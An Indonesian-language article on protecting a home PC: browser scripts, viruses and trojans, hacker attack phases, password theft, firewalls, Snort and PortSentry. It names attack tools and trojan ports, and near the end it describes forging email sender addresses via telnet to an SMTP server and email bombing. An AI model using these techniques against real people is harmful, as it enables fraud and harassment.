Walaupun tidak seberbahaya ActiveX, Java applet juga patut diwaspadai. Java lebih memperhatikan keamanan data pemakai dibandingkan ActiveX. Ada beberapa aturan yang harus diikuti oleh suatu program Java:
Hanya mengakses daerah tertentu pada sistem file komputer lokal.
Tidak menjalankan program lain pada komputer lokal.
Dijalankan hanya pada PC yang terhubung ke Internet
Hanya mengakses sistem file lokal atau melakukan pertukaran  data melalui jaringan dan tidak bisa dua- duanya.
Tidak dapat mengakses memori dari program. Walaupun demikian, bisa saja terjadi kesalahan pemro-
graman. Misalnya port tertentu setelah digunakan oleh
Java applet tetap terbuka sehingga dapat dimanfaatkan
oleh hacker. Namun hal ini memerlukan  keterampilan
khusus, sehingga dalam hal ini Java applet boleh dikata-
kan aman.
Namun untuk memastikan pengamanan PC anda, boleh saja anda men-disable Java pada browser anda. Pilih Tools
> Internet Options. Pilih tab Security pada jendela Internet Options, klik Custom Level untuk mendapatkan jendela Security Setting dan tick pada Disable Java.
Apabila Java applet bersifat lebih aman, maka tidak demi- kian dengan JavaScript dan VBScript. Banyak hal menge- nai software yang terinstal  pada komputer anda dapat diintip dengan JavaScript maupun VBScript. Mereka juga dapat berulang-ulang membuka window baru pada kom- puter anda, suatu hal yang menjengkelkan yang mungkin pernah anda alami juga.
Baik JavaScript maupun VBScript dapat di-nonaktifkan pada browser anda. Kali ini pada pilihan Scripting tick pada Disable.

Infeksi Digital:  Virus dan  Trojan
Bahaya terbesar terhadap komputer anda tetaplah virus dan trojan horse (atau singkatnya disebut trojan). Dari sifatnya, program-program kecil ini berkembang biak dan menyebar luas pada jaringan komputer dan media-media penyimpanan  seperti hard disk, disket, dan CD ROM.
Dengan adanya Internet,  bahaya yang dibawa oleh pro- gram-program  ini meningkat ke skala global, mengingat virus dan trojan dapat menyebar ke seluruh dunia hanya dalam waktu beberapa jam saja. Suatu PC yang diguna- kan untuk sharing data, apakah hanya melalui data trans- fer, jaringan, ataupun Internet,  perlu diberikan perlin- dungan yang memadai terhadap virus dan trojan.




Perlindungan  Terhadap Virus
Dalam prakteknya, terdapat dua opsi untuk menghadapi infeksi virus:
Usaha pencegahan (prophylaxis) unatu melindungi komputer agar tidak terinfeksi virus.
Bila infeksi telah terjadi, maka jalan terbaik adalah mengisolasi infeksi ini dan membersihkan  PC yang bersangkutan  sesegera mungkin.
Dalam usaha pencegahan perlu disadari bahwa satu PC dapat terinfeksi virus sewaktu transfer data. Potensi bahaya datang dari:
Pemakaian media penyimpanan: disket, CD ROM, dan Zip drive. Anda bertanggung  jawab langsung atas pemakaian media penyimpanan.
Bila PC anda terhubung via jaringan (misalnya Internet) ke PC lain, bahaya dapat datang dari sisi lain. Men- download software dapat mengakibatkan anda terkena virus; juga pihak lain dapat menggunakan  koneksi network untuk menempatkan  program di PC anda.
Orang lain yang menggunakan  PC anda dapat meng- akibatkan bahaya, baik sengaja maupun tidak.

Virus Scanner
Walaupun anda sudah sangat berhati-hati, anda harus selalau menggunakan  virus scanner terbaru untuk meme- riksa adanya virus. Sangat mungkin pada suatu ketika anda lalai dalam menerapkan prinsip kehati-hatian.
Selain antivirus komersial seperti Norton Anti Virus 2002, McAffee, dan PC Cillin, terdapat pula anti virus freeware yang tidak kalah kemampuannya dalam melindungi anda terhadap virus. Ada dua antivirus freeware yang sangat baik, yang juga dilengkapi layanan update terhadap virus terbaru:
AntiVir
AVG AntiVirus

Program Siluman: Trojan Horse
Hampir semua orang tahu bahaya virus, tetapi ada  bahaya lain pada network yang bisa membawa bahaya lebih besar: trojan horse. Trojan bersembunyi di latar belakang dengan membuka port tertentu menunggu  diaktifkan oleh penye- rang. Trojan yang menginfeksi PC adalah versi server-nya yang akan dikendalikan penyerang lewat versi client-nya.
Antivirus kini mampu juga mendeteksi adanya trojan, tetapi paling baik menggunakan  scanner yang ditujukan untuk mendeteksi trojan. Berbeda dengan antivirus yang mendeteksi trojan hanya dari file-nya, maka trojan scanner mendeteksi trojan juga dengan melakukan scan terhadap port-port  yang terbuka pada PC anda. Trojan tertentu membuka port tertentu sebagai jalan belakang (backdoor) untuk penyerang masuk ke PC anda. Salah satu trojan scanner yang baik adalah Anti-Trojan  yang dapat di- download di www.anti-trojan.net.
Anti-Trojan  memeriksa adanya trojan dengan melakukan:
port scanning
men-cek registri
men-cek hard disk
yang bila ditemukan adanya trojan, maka anda mempunyai opsi untuk men-delete trojan yang ditemukan. Setelah men-delete trojan tersebut, komputer harus di-boot
ulang.

Karantina Hasil Download

eSafe mempunyai fasilitas Sandbox untuk mengkarantina hasil download dan menjalankannya di bawah lingkungan terkendali

Mengingat virus dan trojan besar sekali kemungkinannya masuk melalui file yang anda download, maka anda perlu mengkarantina  hasil download sebelum yakin bahwa pro- gram hasil download itu benar-benar  aman. Bukan hanya hasil download dari situs-situs  hacking kurang dikenal yang bisa mengandung  virus atau trojan, hasil download dari situs-situs  besar dan terkenal pun tidak lepas dari risiko.
Untuk menguji program yang tidak dikenal dapat dilaku- kan dengan dua cara:
Sistem operasi kedua
Virtual sandbox
Pada yang pertama, anda dapat menginstalasi sistem ope- rasi Windows yang kedua pada partisi tersendiri dan meng- uji program-program yang tidak dikenal hanya pada partisi ini.
Sandbox memonitor dan melindungi komponen-komponen hardware dan software pada PC anda. Sandbox dapat disetel agar hanya program yang dijalankan di dalamnya hanya mengakses port atau direktori tertentu saja.
Sandbox merupakan salah satu fasilitas yang diberikan oleh eSafe. eSafe merupakan software security yang seka- ligus merupakan firewall, anti-virus, dan juga sandbox.
Sandbox pada eSafe dapat dikonfigurasi, namun sudah terdapat aturan tinggal pakai untuk kebanyakan proses pengujian software:
Blank. Set of rule kosong yang mengizinkan semua tipe akses, dan hanya melindungi direktori eSafe agar tidak dapat diubah.
Freeze desktop. Menjaga agar Start menu dan desktop tidak bisa diubah.
Internet Applications. Melindungi terhadap bahaya yang datang dari Internet. Akses hanya diizinkan ke direktori tertentu, terutama  ampuh untuk menghadapi script kiddies.
Internet Explorer. Mencegah penciptaan script file pada semua drive.
Netscape. Serupa dengan fungsi pada Internet  Explorer.
Untrusted Applications. Membatasi akses terhadap download, test, dan temporary  file. Juga mecegah pen- ciptaan script file berbahaya.




Hacker  Attack
Gambaran mengenai hacker yang berupa orang gila kom- puter yang lusuh, kini sudah tidak tepat lagi. Dengan ada- nya Internet  siapa pun dengan sedikit kemauan dan kegi- gihan bisa menjadi hacker. Hacking kini sudah menjadi kegiatan untuk memanfaatkan  waktu luang, terutama
oleh para hacker amatir yang dikenal sebagai script kiddies.
Untuk melindungi komputer anda sewaktu berinternet, anda perlu mengetahui  cara kerja hacker mengakses suatu sistem, yang secara sederhana dapat digambarkan sebagai berikut:




Pilfering





 
Footprinting Scanning Enumeration
Gaining  Access



Escalating
Privilege








Covering  Tracks



Creating
Backdoors



Denial of
Service


Hacking merupakan 'seni'  tersendiri yang melibatkan proses mencari serpihan-serpihan informasi yang berte- baran di mana-mana  dan seolah-olah tidak ada hubung- annya satu sama lainnya. Untuk memberi gambaran ten- tang keseluruhan  proses hacking, di bawah ini disajikan langkah-langkah  logisnya.
1.  Footprinting. Mencari rincian informasi terhadap sistem-sistem  untuk dijadikan sasaran, mencakup pencarian informasi dengan search engine, whois, dan DNS zone transfer.

2.  Scanning. Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan ping sweep dan port scan.
3.  Enumeration. Telaah intensif terhadap sasaran, yang mencari user account absah, network resource and share, dan aplikasi untuk mendapatkan mana yang proteksinya lemah.
4.  Gaining Access. Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran. Meliputi mengintip dan merampas password, menebak password, serta melakukan buffer overflow.
5.  Escalating Privilege. Bila baru mendapatkan user pass- word di tahap sebelumnya, di tahap ini diusahakan mendapat privilese admin jaringan dengan password cracking atau exploit sejenis getadmin, sechole, atau lc_messages.
6.  Pilfering. Proses pengumpulan  informasi dimulai lagi untuk mengidentifikasi mekanisme untuk mendapat- kan akses ke trusted system.  Mencakup evaluasi trust dan pencarian cleartext password di registry, config file, dan user data.
7.  Covering Tracks. Begitu kontrol penuh terhadap sistem diperoleh, maka menutup  jejak menjadi prioritas. Meli- puti membersihkan  network  log dan penggunaan hide tool seperti macam-macam rootkit dan file streaming.
8.  Creating Backdoors. Pintu belakang diciptakan pada ber- bagai bagian dari sistem untuk memudahkan masuk kem- bali ke sistem ini dengan cara membentuk user account palsu, menjadwalkan batch job, mengubah startup file, menanamkan  servis pengendali jarak jauh serta moni- toring tool, dan menggantikan  aplikasi dengan trojan.
9.  Denial of Service. Bila semua usaha di atas gagal, penye- rang dapat melumpuhkan  sasaran sebagai usaha ter- akhir. Meliputi SYN flood, teknik-teknik  ICMP, Super- nuke, land/latierra, teardrop, bonk, newtear, trincoo, smurf, dan lain-lain.

Pada  tahap 1 (footprinting), hacker baru mencari-cari sistem mana yang dapat disusupi. Footprinting merupa- kan kegiatan pencarian data berupa:
Menentukan  ruang lingkup (scope) aktivitas atau serangan
Network enumeration
Interogasi DNS
Mengintai jaringan
Semua kegiatan ini dapat dilakukan dengan tools dan informasi yang tersedia bebas di Internet.  Kegiatan footprinting  ini diibaratkan mencari informasi yang tersedia umum melalui buku telepon. Tools yang tersedia untuk ini di antaranya
Teleport Pro: Dalam menentukan  ruang lingkup, hacker dapat men-download keseluruhan  situs-situs  web yang potensial dijadikan sasaran untuk dipelajari alamat, nomor telepon, contact person, dan lain seagainya.
Whois for 95/9/NT: Mencari informasi mengenai pendaftaran domain yang digunakan suatu organisasi. Di sini ada bahaya laten pencurian domain (domain hijack).
NSLookup: Mencari hubungan  antara domain name
dengan IP address.
Traceroute 0.2: Memetakan topologi jaringan, baik yang menuju sasaran maupun konfigurasi internet jaringan sasaran.




Tahap 2 atau  scanning lebih bersifat aktif terhadap sistem-sistem  sasaran. Di sini diibaratkan hacker sudah mulai mengetuk-ngetuk dinding sistem sasaran untuk mencari apakah ada kelemahannya.
Kegiatan scanning dengan demikian dari segi jaringan sangat 'berisik'  dan mudah dikenali oleh sistem yang dija- dikan sasaran, kecuali menggunakan  stealth scanning.
Scanning tool yang paling legendaris adalah nmap (yang kini sudah tersedia pula untuk Windows 9x/ME maupun DOS), selain SuperScan dan UltraScan yang juga banyak digunakan pada sistem Windows.
Untuk melindungi diri anda dari kegiatan scanning adalah memasang firewall seperti misalnya Zone Alarm, atau bila pada keseluruhan  network, dengan menggunakan  IDS (Intrusion  Detection System) seperti misalnya Snort.

Tahap 3 atau  enumerasi sudah bersifat sangat intrusif terhadap suatu sistem. Di sini penyusup mencari account name yang absah, password, serta share resources yang ada.
Pada tahap ini, khusus untuk sistem-sistem  Windows, terdapat port 139 (NetBIOS session service) yang terbuka untuk resource sharing antar-pemakai  dalam jaringan.
Anda mungkin berpikir bahwa hard disk yang di-share itu hanya dapat dilihat oleh pemakai dalam LAN saja. Kenyataannya  tidak demikian. NetBIOS session service dapat dilihat oleh siapa pun yang terhubung ke Internet di seluruh dunia! Tools seperti Legion, SMBScanner , atau
SharesFinder membuat akses ke komputer orang menjadi begitu mudah (karena pemiliknya lengah membuka resource share tanpa password).

Tahap 4 atau  gaining access adalah mencoba menda- patkan akses ke dalam suatu sistem sebagai user biasa. Ini adalah kelanjutan dari kegiatan enumerasi, sehingga bia- sanya di sini penyerang sudah mempunyai  paling tidak user account yang absah, dan tinggal mencari password- nya saja.
Bila resource share-nya diproteksi dengan password, maka password ini dapat saja ditebak (karena banyak yang meng- gunakan password sederhana dalam melindungi kompu- ternya). Menebaknya dapat secara otomatis melalui dictionary attack (mencobakan kata-kata dari kamus sebagai password) atau brute-force attack (mencobakan kombinasi semua karakter sebagai password). Dari sini penyerang mungkin akan berhasil memperoleh logon sebagai user yang absah.

Tahap 5 atau  Escalating Privilege mengasumsikan bahwa penyerang sudah mendapatkan logon access pada sistem sebagai user biasa.
Penyerang kini berusaha naik kelas menjadi admin (pada sistem Windows) atau menjadi root (pada sistem Unix/Linux). Teknik yang digunakan sudah tidak lagi dictionary attack atau brute-force attack yang memakan waktu itu, melain- kan mencuri password file yang tersimpan dalam sistem dan memanfaatkan  kelemahan sistem.
Pada sistem Windows 9x/ME password disimpan dalam file .PWL sedangkan pada Windows NT/2000 dalam file
.SAM.
Bahaya pada tahap ini bukan hanya dari penyerang di luar sistem, melainkan lebih besar lagi bahayanya adalah
'orang dalam' yaitu user absah dalam jaringan itu sendiri yang berusaha 'naik kelas' menjadi admin atau root.

Pada  tahap 6, 7, dan  8 penyerang sudah berada dan menguasai suatu sistem dan kini berusaha untuk mencari informasi lanjutan  (pilfering), menutupi  jejak penyusup- annya (covering tracks), dan menyiapkan pintu belakang (creating backdoor) agar lain kali dapat dengan mudah masuk lagi ke dalam sistem.
Adanya Trojan pada suatu sistem berarti suatu sistem dapat dengan mudah dimasuki penyerang tanpa harus bersusah payah melalui tahapan-tahapan di atas, hanya karena kecerobohan pemakai komputer itu sendiri.

Terakhir, denial of service, bukanlah tahapan terakhir, melainkan kalau penyerang sudah frustrasi tidak dapat masuk ke dalam sistem yang kuat pertahanannya, maka yang dapat dilakukannya adalah melumpuhkan  saja sis- tem itu dengan menyerangnya menggunakan  paket-paket data yang bertubi-tubi sampai sistem itu crash.
Denial of service attack sangat sulit dicegah, sebab mema- kan habis bandwidth yang digunakan untuk suatu situs. Pencegahannya  harus melibatkan ISP yang bersangkutan. Para script kiddies yang pengetahuan  hacking-nya  ter- batas justru paling gemar melakukan kegiatan yang sudah digolongkan tindakan kriminal di beberapa negara ini.

Bagaimana Hacker Mendapatkan Password?
Dari langkah-langkah  yang dibahas di atas, paling tidak ada tiga langkah yang melibatkan kegiatan mendapatkan password, pada enumeration, gaining access, dan escalating privilege. Password dapat diperoleh dengan banyak cara.
Password cracking hanyalah salah satu cara yang digu- nakan hacker untuk mendapatkan password anda. Ada banyak lagi cara lain, termasuk social engineering, yaitu kata lain dari menipu.
Pada dasarya ada empat cara untuk mendapatkan password
secara 'lebih terhormat,' yaitu:
Menghadang email yang mengirimkan password pada anda.
Menggunakan  password cracker untuk mendapatkan
password anda.
Menggunakan  web spoofing untuk melihat apa yang anda ketikkan secara online, termasuk password anda.
Menggunakan  Java applet dan ActiveX untuk meng- akses hard disk dan mencari password yang tersimpan di dalamnya.

Menghadang  Email

Dsniff dan mailsnarf adalah utilitas yang ‘mengendus paket-paket data yang melewati  suatu network card dan menganalisanya untuk mengeluarkan password (dsniff) maupun isi emailnya (mailsnarf).





















Seperti inilah paket-paket  data yang melewati  suatu network card. Di sini paket-paket  data itu di-capture dengan  WinPCap dan ditampilkan dan disimpan dalam file log oleh Windump.
Pada dasarnya tidak sulit untuk menghadang email. Salah satunya adalah menggunakan  mailsnarf yang terdapat pada utility dsniff. Mailsnarf menghadang paket data yang lewat di Internet  dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnarf merupakan software yang bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket- paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan Mailsnarf bertindak lebih jauh lagi, yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).

Password Cracking

Situs BCA sampamemberi peringatan bahwa URL yang benar untuk Internet Banking-nya adalah http://www.klikbca.com. Hal ini untuk mencegah web spoofing yang memperdaya nasabahnya.

Web Spoofing
Web spoofing pada dasarnya adalah usaha menipu anda agar anda mengira  bahwa anda sedang mengakses suatu situs tertentu, padahal bukan. Cara yang pernah dilakukan terhadap situs web BCA adalah dengan membuat situs mirip BCA yang membuat orang terkecoh sehingga tanpa curiga mengetikkan nama dan password-nya dan nama dan password itupun direkam di server palsu tadi.
Cara lain adalah dengan menjadi situs web perantara anda dengan situs yang anda akses. Dengan kata lain menjadi proxy server untuk anda dalam berselancar. Ada contoh proxy server yang tidak berbahaya, yaitu Anonymizer (http://www.anonymizer.com/), yang membuat identitas anda tidak diketahui oleh situs yang anda kunjungi. Tetapi seluruh identitas anda (dan juga apa yang anda lakukan justru diketahui oleh proxy server ini).


















Brutus, salah satu jenis remote  password cracker yang bekerja dengan teknik dictionary attack atau brute-force attack terhadap port-port http, POP3, ftp, telnet, maupun NetBIOS.

Ada dua macam password cracker. Cara lama adalah dengan mencoba kombinasi password satu per satu sampai dida- pat password yang cocok. Cara ini dikenal sebagai diction- ary attack (bila mencobakan kata-kata yang ada dalam kamus) atau brute-force attack (mencobakan semua kom- binasi huruf, angka, dan karakter). Cara ini sangat lambat dan banyak situs yang menutup  akses terhadap usaha login yang secara berturut-turut tidak berhasil.
Cara lain adalah mencari password anda dari dalam dan cara ini hacker harus masuk ke dalam sistem anda. Ini bisa karena kelemahan sistem atau merupakan kenakalan
'orang dalam' sendiri.





Anonymizer adalah servis untuk berselancar secara anonim. Memang identitas anda tidak akan diketahui oleh situs yang anda kunjungi, tetapi segala hal mengenai diri anda justru dketahui oleh servis ini. Teknik yang digunakan oleh servis ini dapat ditiru untuk membuat situs curang yang tujuannya mengintip semua informasi anda.

Java applet dan  ActiveX
Suatu applet Java atau ActiveX dapat diciptakan untuk mengakses hard disk anda dan melakukan apa saja ter- hadapnya, termasuk membaca password yang tersimpan dalam program penyimpan password.




Fasilitas Windows yang menawarkan untuk mengingat password anda sangat berbahaya, sebab membuat pass- word itu tersimpan di cache memory dan dapat diakses dengan mudah dengan pelbagai password revealer seperti Snadboy’s Revelation atau 007 Password Recovery.
Lebih aman menyimpan  password anda di secarik kertas. Tidak juga dalam zip file yang juga bisa di-crack.

Melindungi Komputer Anda
Untuk menghadapi sebagian besar bahaya di Internet, paling tidak komputer anda harus dilengkapi oleh dua hal berikut ini; adapun yang ketiga boleh juga digunakan untuk lebih melindungi komputer anda serta untuk menyimpan  bukti adanya serangan.
Antivirus yang di-update secara berkala. Dapat pilih Norton Antivirus, McAffee, PCCillin, Panda Anti Virus, dan Norman Anti Virus. Dapat juga gunakan versi freeware seperti AVG Anti Virus dan AntiVir.
Personal Firewall. Yang banyak digunakan adalah Zone Alarm yang amat mudah digunakan dan cukup efektif memonitor  dan mencegah akses dari Internet  ke kom- puter anda atau sebaliknya.
IDS. Menggunakan software yang mencatat (logging) serangan ke komputer anda. Hal ini dapat dilakukan dengan IDS (Intrusion  Detection System) seperti Salus, Snort, atau BlackICE Defender.

Antivirus


















Norton Anti Virus (seperti juga McAffee dan lainnya) meng-upate data yang paling mutakhir mengenai virus yang ada secara berkala

Antivirus akan sekaligus juga mencegah masuknya trojan ke dalam komputer anda seperti telah dibahas sebelumnya.

Firewall

Personal Firewall seperti Zone
Alarm amat mudah  digunakan.


Firewall bertindak bahkan sebe- lum serangan terjadi. Firewall dapat berupa software atau hardware atau keduanya yang melindungi komputer anda dengan memonitor  dan me- nyaring semua paket data yang keluar masuk komputer anda

dengan Internet.  Firewall menganalisa paket data dan mempelajari:
Sumber paket data
Komputer yang dituju oleh paket data
Protokol yang digunakan
Isi paket data
Dengan demikian, bila anda menggunakan  firewall, maka anda dapat:
Memblokir paket data dari alamat-alamat  tertentu
Memblokir pertukaran  data antara satu PC dengan lainnya sesuai dengan yang ditentukan
Mencegah pemakaian protokol tertentu
Menolak paket data dengan kata-kata tertentu di dalamnya.

Snort  Intrusion Detection System
Snort adalah suatu NIDS (Network-based Intrusion De- tection System). Sebuah NIDS akan memperhatikan selu- ruh segmen jaringan tempat dia berada, berbeda dengan host-based IDS yang hanya memperhatikan sebuah
mesin tempat software host based IDS tersebut di pasang. Secara sederhana, sebuah NIDS akan mendeteksi semua serangan yang dapat melalui jaringan komputer (Internet maupun Intranet)  ke jaringan atau komputer yang kita miliki.
Sebuah NIDS biasanya digunakan bersamaan dengan firewall, hal ini untuk menjaga supaya Snort tidak terancam dari serangan. Sebagai contoh jika Snort akan ditempelkan
pada interface ISDN ppp0, maka sebaiknya di mesin yang sama dipasang firewall dan router sambungan dial-up-nya.
Bagi pengguna yang memasang Snort pada mesin yang sering sekali diserang, ada baiknya memasang ACID (Analysis Console for Intrusion  Databases), yang merupa- kan bagian dari AIR-CERT project. ACID menggunakan PHPlot, sebuah library untuk membuat grafik yang baik di PHP, dan ADODB, sebuah library abstraksi untuk menggabungkan  PHP ke berbagai database seperti MySQL dan Postgre SQL.

Mengoperasikan Snort
Secara umum Snort dapat dioperasikan dalam tiga mode, yaitu
Sniffer mode, untuk melihat paket yang lewat di jaringan.
Packet logger mode, untuk mencatat semua paket yang lewat di jaringan untuk dianalisa di kemudian hari.
Intrusion Detection mode, pada mode ini Snort berfungsi mendeteksi serangan yang dilakukan melalui jaringan komputer. Untuk menggunakan  mode IDS ini diperlu- kan setup dari berbagai aturan (rules) yang akan mem- bedakan sebuah paket normal dengan paket yang mem- bawa  serangan.

Snort for  Windows
Snort selain terdapat pada Linux, kini terdapat pula pada Windows lengkap dengan GUI (Graphical User Interface) IDS Center yang amat memudahkan  penggunaannya.
Snort memanfaatkan WinPCap untuk menangkap paket- paket data yang lalu-lalang melalui jaringan. Download WinPCap di http://winpcap.polito.it/install/default.htm.






















Adanya IDS Center sebagai GUI untuk Snort pada Windows membuatnya menjadi mudah  digunakan.

Download dan instal Snort for Windows versi 1.7 dan versi 1.8.7. Misal pada direktori snort.
Download IDSCenter 1.09beta 1.3 di http://idsc.emojo.com/Downloads/index.cfm. Setelah itu instal IDSCenter ini.
Kini kita siap untuk menggabungkan  ketiga software ini menjadi network-based IDS di Windows.

Port yang  Terbuka: Mengundang Hacker
Seperti telah dibahas di awal makalah ini, anda dapat memeriksa komputer anda sendiri apakah ada port-port yang terbuka. Anda dapat menggunakan  Supercan yang sangat mudah penggunaannya atau dapat juga menggu- nakan Nmap yang merupakan tool sangat berharga bagi seorang hacker. Sebelum hacker menemukan  port terbuka pada komputer anda, dapatkan dulu sendiri hal itu sehingga anda dapat mengambil tindakan yang perlu.

Port-port yang  Perlu  Dicurigai
Jumlah port semuanya 65536 (0 sampai 65535). Port-port yang terkenal adalah port nomor 0 sampai 1023, port-port terdaftar dari 1024 sampai 49151, dan dynamic dan/atau private port dari 49152 sampai 65535.
Dari sekian banyak port, mana yang biasa dan aman ter- buka dan mana yang tidak? Seperti dibahas sebelumnya, komputer pribadi yang hanya dipakai untuk mengakses Internet  pada umumnya hanya membuka port 25 dan
110, serta 139 apabila menggunakan  Windows 9x/ME. Namun online game menggunakan  port-port  nomor ter- tentu seperti 1025 untuk Network Blackjack serta Micro- soft Gaming Zone menggunakan  port 28800 agar para pemain dapat saling mengirim ping satu sama lain.
Untuk mempelajari apakah suatu port yang terbuka pada komputer perlu dicurigai, anda dapat dilihat di situs-situs berikut:
http://www.glocksoft.com/trojan  port.htm atau situs serupa lain lain.
Back Orifice/Back Orifice 2000
54320, 54321
NetBus 1.60, 1.70
12345
NetBusPro 2.01
20034
SubSeven
27374

 
Di bawah ini beberapa port Trojan horse yang popular:

PortSentry: Menjaga Port yang  Terbuka
Bahasan berikut bukanlah untuk komputer pemakai biasa, melainkan untuk komputer yang bertindak sebagai server. Apabila suatu port memang harus terbuka karena memang memberi servis tertentu pada Internet,  maka untuk men- jaga port tersebut dari serangan port scan dapat digunakan PortSentry. PortSentry hanya ada pada Linux, sedangkan pada sistem Windows hanya tersedia versi komersial dari Host-based  IDS ini.
Mengapa kita perlu mendeteksi port scan? Jawaban versi hebohnya kira-kira sebagai berikut, port scan adalah awal dari masalah besar yang akan datang melalui jaringan. Port
scan merupakan awal serangan dan hasil port scan membawa beberapa informasi kritis yang sangat penting untuk perta- hanan mesin dan sumber daya yang kita miliki. Keberhasilan untuk menggagalkan port scan akan menyebabkan penye- rang tidak berhasil memperoleh informasi strategis yang dibutuhkan sebelum serangan yang sebetulnya dilakukan.
PortSentry dapat di terjemahkan  ke bahasa Indonesia se- bagai Penjaga Gerbang/Pelabuhan. Sentry berarti penjaga, Port dapat diterjemahkan  gerbang atau pelabuhan. Seke- dar latar belakang informasi, pada jaringan komputer (Internet),  masing-masing  server aplikasi akan stand-by pada port tertentu, misalnya, Web pada port 80, mail (SMTP) pada port 25, mail (POP3) pada port 110. PortSentry adalah program yang dirancang untuk mendeteksi dan menanggapi kegiatan port scan pada sebuah mesin secara real-time.
Bagi pengguna Mandrake 8.0, PortSentry telah tersedia dalam CD-ROM dalam format RPM. Instalasi PortSentry menjadi amat sangat mudah dengan di bantu oleh program Software Manager. Yang kita lakukan tinggal:
Mencari PortSentry dalam paket program.
Pilih (Klik) PortSentry.
Klik Install maka PortSentry.
Secara automagic anda akan memperoleh PortSentry.






















PortSentry dengan  mudah  dapat di-instal dari Linux Mandrake 8.0
Installation CD. Sayang pada versi 8.2 sudah tidak disertakan.


Bagi pengguna Mandrake 8.2 ternyata  PortSentry tidak dimasukkan dalam CD ROM Mandrake 8.2, jadi anda harus menggunakan  CD Mandrake 8.0 untuk mengambil PortSentry dan menginstalnya.




Beberapa fitur yang dimiliki oleh PortSentry, antara lain:
Mendeteksi adanya stealth port scan untuk semua platform Unix. Stealth port scan adalah teknik port scan yang tersamar/tersembunyi, biasanya sukar di deteksi oleh sistem operasi.
PortSentry akan mendeteksi berbagai teknik scan seperti SYN/half-open, FIN, NULL dan X-MAS. Untuk menge- tahui lebih jelas tentang berbagai teknik ini ada baiknya untuk membaca-baca manual nmap yang merupakan salah satu port scan software terbaik yang ada.
PortSentry akan bereaksi terhadap usaha port scan dari lawan dengan cara memblokir penyerang secara real- time dari usaha auto-scanner, probe penyelidik, maupun serangan terhadap sistem.
PortSentry akan melaporkan semua kejanggalan dan pelanggaran kepada software daemon syslog lokal maupun remote yang berisi nama sistem, waktu serangan, IP penyerang maupun nomor port TCP atau UDP tempat serangan di lakukan. Jika PortSentry didampingkan dengan LogSentry, dia akan memberikan berita kepada administrator melalui e-mail.
Fitur cantik PortSentry adalah pada saat terdeteksi adanya scan, sistem anda tiba-tiba menghilang dari hadapan si penyerang. Fitur ini membuat penyerang tidak berkutik.
PortSentry selalu mengingat alamat IP penyerang, jika ada serangan Port Scan yang sifatnya acak (random) PortSentry akan bereaksi.
Salah satu hal yang menarik dari PortSentry adalah bahwa program ini dirancang agar dapat dikonfigurasi secara sederhana sekali dan bebas dari keharusan memelihara.
Beberapa hal yang mungkin menarik dari kemampuan PortSentry antara lain: PortSentry akan mendeteksi semua hubungan  antar-komputer menggunakan  protokol TCP maupun UDP. Melalui file konfigurasi yang ada. PortSentry akan memonitor  ratusan port yang di-scan secara berurutan maupun secara acak. Karena PortSentry juga memonitor  protokol UDP, PortSentry akan membe- ritahukan  kita jika ada orang yang melakukan probing (uji coba) pada servis RPC, maupun servis UDP lainnya seperti TFTP, SNMP dll.

Email Sebagai Senjata
Bahwa virus dan worm sering dikirim melaui attachment email, sudah banyak diketahui orang. Setelah Nimda, sekarang ada worm Klez sampai sekarang masih saja berkeliaran, membuatnya menjadi worm yang paling sulit dibasmi. Untunglah  antivirus yang ada memberi juga per- lindungan dengan jalan men-scan email yang diterima (dan juga dikirim terhadap kemungkinan  adanya virus). Bahkan servis web email gratis Yahoo! Memberikan juga pelayanan scan terhadap virus.
Namun selain sebagai media penyebaran virus dan worm, email itu sendiri  dapat dijadikan senjata dalam perang di dunia cyber.

Surat  Kaleng  di Internet
Dengan pos biasa setiap orang bisa mengirim surat tanpa alamat si pengirim (surat kaleng); tapi bagaimana dengan email? Apakah bisa kita mengirim 'email kaleng'?

Anda dapat mengirim anonymous email dengan software seperti Private Idaho dengan menggunakan  fasilitas remailer yang ada pada software ini. Private Idaho dapat
di-download di http://www.lynagh.demon.co.uk/pidaho dan untuk menjalankannya diperlukan VBRun300.dll di C:\Windows\System. Download VBRun300.dll di sini:
Gambar di bawah menunjukkan cara Private Idaho bekerja, yaitu mengirimkan  email anda ke tujuan melewati bebe- rapa kali remailer yang akan mengirimkan  anonymous email dari satu remailer ke yang lain sebelum email itu sampai di tujuan.





















Private Idaho memanfaatkan remailer secara berantai untuk menyembungikan identitas pengirim email.

Email dengan Alamat  Pengirim Palsu
Mengirim email kaleng artinya email tanpa alamat pe- ngirim, tapi bagaimana dengan alamat palsu? Dalam pos biasa kita tinggal menulis saja alamat palsu dan mem- poskannya. Pada email sebenarnya juga hampir semudah itu, yaitu dengan mengakses SMTP server kita dengan telnet dan sewaktu komunikasi dengan SMTP server kita tinggal ketikkan saja email address kita (sebagai pengirim) sesuka-suka kita.
Fasilitas telnet terdapat pada setiap mesin Windows dengan menjalankan Start > Run lalu ketikkan telnet. Akan tampil jendela Telnet. Pilih menu Connect > Remote System dan masukkan SMTP mail anda pada Host Name dan anda akan mengakses server ini melalui fasilitas Telnet. Akses



telnet ke server SMTP biasanya hanya disedia- kan apabila anda seba- gai pelangan ISP ter- sebut sudah logon ke langsung ke server-nya melalui fasilitas dial up.

Mendaftarkan email korban pada banyak mailing list adalah salah satu teknik untuk mengirim email bomb.






Mengakses SMTP server melalui telnet. Selanjutnya dalam komunikasi dengan  server anda dapat mengirim email dengan  header yang diubah sesuai keinginan anda.

Bagaimana anda melindungi diri dari kebohongan email palsu ini? Bila anda merasa curiga terhadap email terten- tu, anda harus melihat header-nya. Sayangnya hampir semua mailer secara default menyembunyikan data ini.
Pada Outlook Express anda dapat melihat rincian header email yang anda curigai dengan memilih email itu, lalu pilih File > Properties lalu pilih tab Detail serta tombol Message Source. Bandingkan isi From: dengan X-Sender. Bila berbeda, maka paling tidak anda tahu siapa pengirim sebenarnya. X-Sender berasal dari mail server pengirim dan lebih sukar dimanipulasi.

Metode paling sederhana dari email bomb adalah dengan mengirimkan  sejumlah besar email ke alamat email korban. Jumlah email yang dikirim tidak harus ratusan, ribuan, atau lebih, namun dapat juga lebih sedikit, asalkan isinya besar, misalnya dengan memberikan attachment berupa file yang besar.
